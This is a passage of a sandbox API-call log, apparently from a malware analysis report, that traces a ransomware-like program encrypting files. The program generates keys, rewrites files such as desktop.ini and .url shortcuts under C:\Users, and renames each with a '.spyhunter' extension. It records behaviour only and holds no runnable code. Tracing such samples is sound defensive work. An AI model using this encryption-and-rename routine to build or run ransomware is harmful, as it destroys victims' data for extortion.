GetProcessHeap () returned 0x2c0000 [0142.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0142.041] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x25cf008*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x25cf008*=0x30) returned 1 [0142.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\." (normalized: "c:\\users\\default\\desktop\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.041] GetProcessHeap () returned 0x2c0000 [0142.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0142.041] GetProcessHeap () returned 0x2c0000 [0142.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f367c0 | out: hHeap=0x2c0000) returned 1 [0142.042] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf008 | out: pbBuffer=0x25cf008) returned 1 [0142.042] GetProcessHeap () returned 0x2c0000 [0142.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0142.042] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x25cf000*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x25cf000*=0x30) returned 1 [0142.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.043] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini") returned 41 [0142.043] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0142.043] GetProcessHeap () returned 0x2c0000 [0142.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.043] ReadFile (in: hFile=0x120, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cefc4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cefc4*=0x19c, lpOverlapped=0x0) returned 1 [0142.043] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xfffffe64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.044] WriteFile (in: hFile=0x120, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x19c, lpNumberOfBytesWritten=0x25cefc4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cefc4*=0x19c, lpOverlapped=0x0) returned 1 [0142.044] GetProcessHeap () returned 0x2c0000 [0142.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.044] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.044] WriteFile (in: hFile=0x120, lpBuffer=0x25cf004*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cefc4, lpOverlapped=0x0 | out: lpBuffer=0x25cf004*, lpNumberOfBytesWritten=0x25cefc4*=0x4, lpOverlapped=0x0) returned 1 [0142.044] WriteFile (in: hFile=0x120, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cefc4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x25cefc4*=0x30, lpOverlapped=0x0) returned 1 [0142.045] CloseHandle (hObject=0x120) returned 1 [0142.049] GetProcessHeap () returned 0x2c0000 [0142.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0142.054] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini.spyhunter") returned 51 [0142.054] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini.spyhunter" (normalized: "c:\\users\\default\\contacts\\desktop.ini.spyhunter")) returned 1 [0142.181] GetProcessHeap () returned 0x2c0000 [0142.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0142.181] GetProcessHeap () returned 0x2c0000 [0142.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0142.181] GetProcessHeap () returned 0x2c0000 [0142.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0a908 | out: hHeap=0x2c0000) returned 1 [0142.182] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf000 | out: pbBuffer=0x25cf000) returned 1 [0142.182] GetProcessHeap () returned 0x2c0000 [0142.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0142.182] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x25ceff8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x25ceff8*=0x30) returned 1 [0142.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0142.226] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 78 [0142.226] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch=".txt") returned 0x0 [0142.226] GetProcessHeap () returned 0x2c0000 [0142.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0142.226] ReadFile (in: hFile=0x184, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cefbc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cefbc*=0x85, lpOverlapped=0x0) returned 1 [0142.227] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.227] WriteFile (in: hFile=0x184, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x25cefbc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cefbc*=0x85, lpOverlapped=0x0) returned 1 [0142.227] GetProcessHeap () returned 0x2c0000 [0142.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0142.227] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.227] WriteFile (in: hFile=0x184, lpBuffer=0x25ceffc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cefbc, lpOverlapped=0x0 | out: lpBuffer=0x25ceffc*, lpNumberOfBytesWritten=0x25cefbc*=0x4, lpOverlapped=0x0) returned 1 [0142.227] WriteFile (in: hFile=0x184, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cefbc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x25cefbc*=0x30, lpOverlapped=0x0) returned 1 [0142.227] CloseHandle (hObject=0x184) returned 1 [0142.228] GetProcessHeap () returned 0x2c0000 [0142.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0142.228] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.spyhunter") returned 88 [0142.228] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.spyhunter" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url.spyhunter")) returned 1 [0142.228] GetProcessHeap () returned 0x2c0000 [0142.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0142.228] GetProcessHeap () returned 0x2c0000 [0142.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0142.228] GetProcessHeap () returned 0x2c0000 [0142.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f32960 | out: hHeap=0x2c0000) returned 1 [0142.228] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf000 | out: pbBuffer=0x25cf000) returned 1 [0142.229] GetProcessHeap () returned 0x2c0000 [0142.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0142.229] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x25ceff8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x25ceff8*=0x30) returned 1 [0142.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\." (normalized: "c:\\users\\default\\favorites\\links\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.315] GetProcessHeap () returned 0x2c0000 [0142.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0142.315] GetProcessHeap () returned 0x2c0000 [0142.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bee8 | out: hHeap=0x2c0000) returned 1 [0142.316] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceff8 | out: pbBuffer=0x25ceff8) returned 1 [0142.316] GetProcessHeap () returned 0x2c0000 [0142.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0142.316] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x25ceff0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x25ceff0*=0x30) returned 1 [0142.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0142.316] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini") returned 37 [0142.316] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0142.316] GetProcessHeap () returned 0x2c0000 [0142.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0142.316] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cefb4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cefb4*=0x17c, lpOverlapped=0x0) returned 1 [0142.317] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffe84, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.317] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x25cefb4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cefb4*=0x17c, lpOverlapped=0x0) returned 1 [0142.317] GetProcessHeap () returned 0x2c0000 [0142.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0142.317] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.317] WriteFile (in: hFile=0x170, lpBuffer=0x25ceff4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cefb4, lpOverlapped=0x0 | out: lpBuffer=0x25ceff4*, lpNumberOfBytesWritten=0x25cefb4*=0x4, lpOverlapped=0x0) returned 1 [0142.318] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cefb4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x25cefb4*=0x30, lpOverlapped=0x0) returned 1 [0142.318] CloseHandle (hObject=0x170) returned 1 [0142.318] GetProcessHeap () returned 0x2c0000 [0142.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0142.318] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini.spyhunter") returned 47 [0142.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini.spyhunter" (normalized: "c:\\users\\public\\music\\desktop.ini.spyhunter")) returned 1 [0142.319] GetProcessHeap () returned 0x2c0000 [0142.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0142.319] GetProcessHeap () returned 0x2c0000 [0142.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0142.319] GetProcessHeap () returned 0x2c0000 [0142.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x350f60 | out: hHeap=0x2c0000) returned 1 [0142.319] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceff8 | out: pbBuffer=0x25ceff8) returned 1 [0142.319] GetProcessHeap () returned 0x2c0000 [0142.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0142.319] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x25ceff0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x25ceff0*=0x30) returned 1 [0142.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\.." (normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.319] GetProcessHeap () returned 0x2c0000 [0142.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0142.319] GetProcessHeap () returned 0x2c0000 [0142.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f37040 | out: hHeap=0x2c0000) returned 1 [0142.319] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceff0 | out: pbBuffer=0x25ceff0) returned 1 [0142.319] GetProcessHeap () returned 0x2c0000 [0142.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0142.320] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x25cefe8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x25cefe8*=0x30) returned 1 [0142.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\." (normalized: "c:\\users\\public\\music\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.320] GetProcessHeap () returned 0x2c0000 [0142.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0142.320] GetProcessHeap () returned 0x2c0000 [0142.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d19b0 | out: hHeap=0x2c0000) returned 1 [0142.406] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cefe8 | out: pbBuffer=0x25cefe8) returned 1 [0142.406] GetProcessHeap () returned 0x2c0000 [0142.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.406] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cefe0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cefe0*=0x30) returned 1 [0142.406] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.406] GetProcessHeap () returned 0x2c0000 [0142.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.406] GetProcessHeap () returned 0x2c0000 [0142.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30e928 | out: hHeap=0x2c0000) returned 1 [0142.406] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cefe8 | out: pbBuffer=0x25cefe8) returned 1 [0142.406] GetProcessHeap () returned 0x2c0000 [0142.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.407] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cefe0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cefe0*=0x30) returned 1 [0142.407] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\." (normalized: "c:\\users\\default\\saved games\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.407] GetProcessHeap () returned 0x2c0000 [0142.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.407] GetProcessHeap () returned 0x2c0000 [0142.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30e898 | out: hHeap=0x2c0000) returned 1 [0142.408] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cefe0 | out: pbBuffer=0x25cefe0) returned 1 [0142.408] GetProcessHeap () returned 0x2c0000 [0142.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.408] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cefd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cefd8*=0x30) returned 1 [0142.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini" (normalized: "c:\\users\\default\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0142.447] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini") returned 41 [0142.447] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0142.447] GetProcessHeap () returned 0x2c0000 [0142.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0142.447] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cef9c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cef9c*=0x1f8, lpOverlapped=0x0) returned 1 [0142.448] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffe08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.448] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x25cef9c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cef9c*=0x1f8, lpOverlapped=0x0) returned 1 [0142.448] GetProcessHeap () returned 0x2c0000 [0142.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0142.448] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.448] WriteFile (in: hFile=0x170, lpBuffer=0x25cefdc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cef9c, lpOverlapped=0x0 | out: lpBuffer=0x25cefdc*, lpNumberOfBytesWritten=0x25cef9c*=0x4, lpOverlapped=0x0) returned 1 [0142.449] WriteFile (in: hFile=0x170, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cef9c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cef9c*=0x30, lpOverlapped=0x0) returned 1 [0142.449] CloseHandle (hObject=0x170) returned 1 [0142.449] GetProcessHeap () returned 0x2c0000 [0142.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.449] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini.spyhunter") returned 51 [0142.449] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini" (normalized: "c:\\users\\default\\pictures\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini.spyhunter" (normalized: "c:\\users\\default\\pictures\\desktop.ini.spyhunter")) returned 1 [0142.449] GetProcessHeap () returned 0x2c0000 [0142.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.449] GetProcessHeap () returned 0x2c0000 [0142.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.449] GetProcessHeap () returned 0x2c0000 [0142.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0b1c8 | out: hHeap=0x2c0000) returned 1 [0142.450] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cefd8 | out: pbBuffer=0x25cefd8) returned 1 [0142.450] GetProcessHeap () returned 0x2c0000 [0142.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.450] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cefd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cefd0*=0x30) returned 1 [0142.450] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0142.473] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini") returned 50 [0142.473] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0142.474] GetProcessHeap () returned 0x2c0000 [0142.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0142.474] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cef94, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cef94*=0x24a, lpOverlapped=0x0) returned 1 [0142.474] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffdb6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.474] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x24a, lpNumberOfBytesWritten=0x25cef94, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cef94*=0x24a, lpOverlapped=0x0) returned 1 [0142.475] GetProcessHeap () returned 0x2c0000 [0142.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0142.475] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.475] WriteFile (in: hFile=0xb0, lpBuffer=0x25cefd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cef94, lpOverlapped=0x0 | out: lpBuffer=0x25cefd4*, lpNumberOfBytesWritten=0x25cef94*=0x4, lpOverlapped=0x0) returned 1 [0142.475] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cef94, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cef94*=0x30, lpOverlapped=0x0) returned 1 [0142.475] CloseHandle (hObject=0xb0) returned 1 [0142.475] GetProcessHeap () returned 0x2c0000 [0142.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.475] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini.spyhunter") returned 60 [0142.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini.spyhunter" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini.spyhunter")) returned 1 [0142.476] GetProcessHeap () returned 0x2c0000 [0142.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.476] GetProcessHeap () returned 0x2c0000 [0142.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.476] GetProcessHeap () returned 0x2c0000 [0142.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c22070 | out: hHeap=0x2c0000) returned 1 [0142.476] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cefd8 | out: pbBuffer=0x25cefd8) returned 1 [0142.476] GetProcessHeap () returned 0x2c0000 [0142.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.476] CryptEncrypt 